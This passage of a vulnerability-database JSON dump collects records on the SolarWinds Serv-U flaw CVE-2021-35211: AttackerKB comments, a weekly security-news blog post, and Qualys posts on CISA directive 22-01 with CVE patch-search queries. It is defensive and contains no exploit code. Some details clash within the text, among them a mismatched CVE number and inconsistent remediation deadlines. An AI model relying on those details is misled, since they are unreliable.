4:00pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\n**wvu-r7** at July 22, 2021 4:35pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-35211", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-35211"], "modified": "2021-07-27T00:00:00", "id": "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "href": "https://attackerkb.com/topics/Toj3cA6kd7/cve-2021-35211", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! The fourth episode of Last Week\u2019s Security news, July 12 \u2013 July 18.\n\nI would like to start with some new public exploits. I think these 4 are the most interesting.\n\n * If you remember, 2 weeks ago I mentioned the ForgeRock Access Manager and OpenAM vulnerability (CVE-2021-35464). Now there is a [public RCE exploit](<https://vulners.com/packetstorm/PACKETSTORM:163525>) for it. ForgeRock OpenAM server is a popular access management solution for web applications. [Michael Stepankin, Researcher](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>): "In short, RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM". And now this vulnerability [is Under Active Attack](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>). "The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools," the organization said in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them".\n * [A new exploit for vSphere Client](<https://vulners.com/packetstorm/PACKETSTORM:163487>) (CVE-2021-21985). The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n * [Apache Tomcat 9.0.0.M1 - Open Redirect](<https://vulners.com/exploitdb/EDB-ID:50118>) (CVE-2018-11784). "When the default servlet in Apache Tomcat [\u2026] returned a redirect to a directory [\u2026] a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice".\n * [Apache Tomcat 9.0.0.M1 - Cross-Site Scripting](<https://vulners.com/exploitdb/EDB-ID:50119>) (CVE-2019-0221). "The SSI printenv command in Apache Tomcat [\u2026] echoes user provided data without escaping and is, therefore, vulnerable to XSS". However, in real life this is unlikely to be used. "SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website".\n\nFor the last 2 weeks I have mentioned PrintNightmare and Kaseya. These topics seem to be coming to their logical end. But there is still something to tell about them.\n\n * Microsoft has shared guidance revealing yet [another vulnerability connected to its Windows Print Spooler service](<https://www.theregister.com/2021/07/16/spooler_service_local_privilege_escalation/>), saying it is "developing a security update." \nThe latest Print Spooler service vuln [\u2026] is an elevation of privilege [\u2026]. An attacker needs to be able to execute code on the victim system to exploit the vulnerability [\u2026]. The solution? For now, you can only "stop and disable the Print Spooler service," disabling both the ability to print locally and remotely. \n * Following the supply-chain ransomware attack, Kaseya had urged on-premises VSA customers to shut down their servers until a patch was available. Almost 10 days later the firm [has shipped new VSA version](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) with fixes for three security flaws (CVE-2021-30116 - Credentials leak and business logic flaw; CVE-2021-30119 - Cross-site scripting vulnerability; CVE-2021-30120 - Two-factor authentication bypass). The other 4 out of 7 vulnerabilities that could have been exploited in the attack were fixed earlier. Interestingly, REvil, the infamous ransomware cartel behind this attack, has [mysteriously disappeared from the dark web](<https://thehackernews.com/2021/07/revil-ransomware-gang-mysteriously.html>), leading to speculations that the criminal enterprise may have been taken down. Let's hope so.\n\nMost news sites over the past week have written about the use of [SolarWinds Zero-Day RCE (CVE-2021-35211) in targeted attacks](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). "A memory escape vulnerability in SolarWinds Serv-U Managed File Transfer Server. The flaw exists due to the way Serv-U has implemented the Secure Shell (SSH) protocol and can only be exploited if an organization has made the Serv-U SSH protocol externally accessible. Microsoft says that, if exploited, an attacker would be able to \u201cremotely run arbitrary code with privileges,\u201d which may include but is not limited to installing or executing malicious code, as well as accessing or altering data on the system". On July 13, Microsoft published a blog post providing additional insight into their discovery of the flaw and the exploitation activity associated with it. Over 8,000 systems remain publicly accessible and potentially vulnerable.\n\nAlso, news sites wrote a lot about [the dangers of Industrial and Utility Takeovers](<https://threatpost.com/unpatched-critical-rce-industrial-utility-takeovers/167751/>). "A critical remote code-execution (RCE) vulnerability in Schneider Electric programmable logic controllers (PLCs) has come to light (CVE-2021-22779), which allows unauthenticated cyberattackers to gain root-level control over PLCs used in manufacturing, building automation, healthcare and enterprise environments. Schneider has released a set of mitigations for the bug, but no full patch is available yet".\n\nSeveral large Security Bulletins have been published last week:\n\n * [Android Security Bulletin for July 2021](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/13/google-android-july-2021-security-patch-vulnerabilities-discover-and-take-remote-response-action-using-vmdr-for-mobile-devices>) addresses 44 vulnerabilities, out of which 7 are rated as critical vulnerabilities.\n * [Adobe Patches 11 Critical Bugs](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>) in Popular Acrobat PDF Reader.\n * [Microsoft Patch Tuesday fixes 13 critical flaws](<https://www.welivesecurity.com/2021/07/14/microsoft-patch-tuesday-july>), including 4 under active attack. I have released [a separate video with an overview of these vulnerabilities](<https://avleonov.com/2021/07/15/vulristics-microsoft-patch-tuesday-july-2021-zero-days-eop-in-kernel-and-rce-in-scripting-engine-rces-in-kernel-dns-server-exchange-and-hyper-v/>) and recommend watching it.\n\nThere were some other interesting news that I would like to point out, but I do not want to make this episode too long. Therefore, I will do it very briefly.\n\n * [Google patches Chrome zero\u2011day](<https://www.welivesecurity.com/2021/07/16/google-patches-chrome-zero-day-vulnerability-exploited-in-the-wild>) vulnerability exploited in the wild (CVE-2021-30563). \n * [Critical Juniper Bug Allows DoS, RCE](<https://threatpost.com/critical-juniper-bug-dos-rce-carrier/167869/>) Against Carrier Networks (CVE-2021-0276, CVE-2021-0277).\n * [SonicWall has told users of two legacy products](<https://www.computerweekly.com/news/252504083/Legacy-SonicWall-kit-exploited-in-ransom-campaign>) running unpatched and end-of-life firmware to take immediate and urgent action to head off an \u201cimminent\u201d ransomware campaign.\n * [Attackers Exploited 4 Zero-Day Flaws](<https://www.darkreading.com/attacks-breaches/attackers-exploited-4-zero-day-flaws-in-chrome-safari-and-ie/d/d-id/1341542>) in Chrome, Safari & IE.\n * [CloudFlare CDNJS Bug Could Have Led to Widespread Supply-Chain Attacks](<https://thehackernews.com/2021/07/cloudflare-cdnjs-bug-could-have-led-to.html>). CDNJS is a free and open-source content delivery network (CDN) that serves about 4,041 JavaScript and CSS libraries.\n * Microsoft to beef up security portfolio with [reported half-billion-dollar RiskIQ buyout](<https://www.theregister.com/2021/07/13/microsoft_riskiq_acquisition/>). RiskIQ is all about using security intelligence to protect the attack surface of an enterprise. \n * Chinese makers of network software and hardware must [alert Beijing within two days of learning of a security vulnerability](<https://www.theregister.com/2021/07/15/china_vulnerability_law/>) in their products under rules coming into force in China this year. \n![](http://feeds.feedburner.com/~r/avleonov/~4/gHnqqNZIYuo)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-19T16:29:00", "type": "avleonov", "title": "Last Week\u2019s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0277", "CVE-2021-35464", "CVE-2021-0276", "CVE-2021-22779", "CVE-2021-21985", "CVE-2021-30563", "CVE-2021-30119", "CVE-2018-11784", "CVE-2021-30116", "CVE-2021-35211", "CVE-2019-0221", "CVE-2021-30120"], "modified": "2021-07-19T16:29:00", "id": "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "href": "http://feedproxy.google.com/~r/avleonov/~3/gHnqqNZIYuo/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture1.jpg)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture3.png)\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture4.png)\n\n### Summary Dashboard High Level Structured by Vendor:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture5.png)\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture6.jpg)\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture7.jpg)\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to 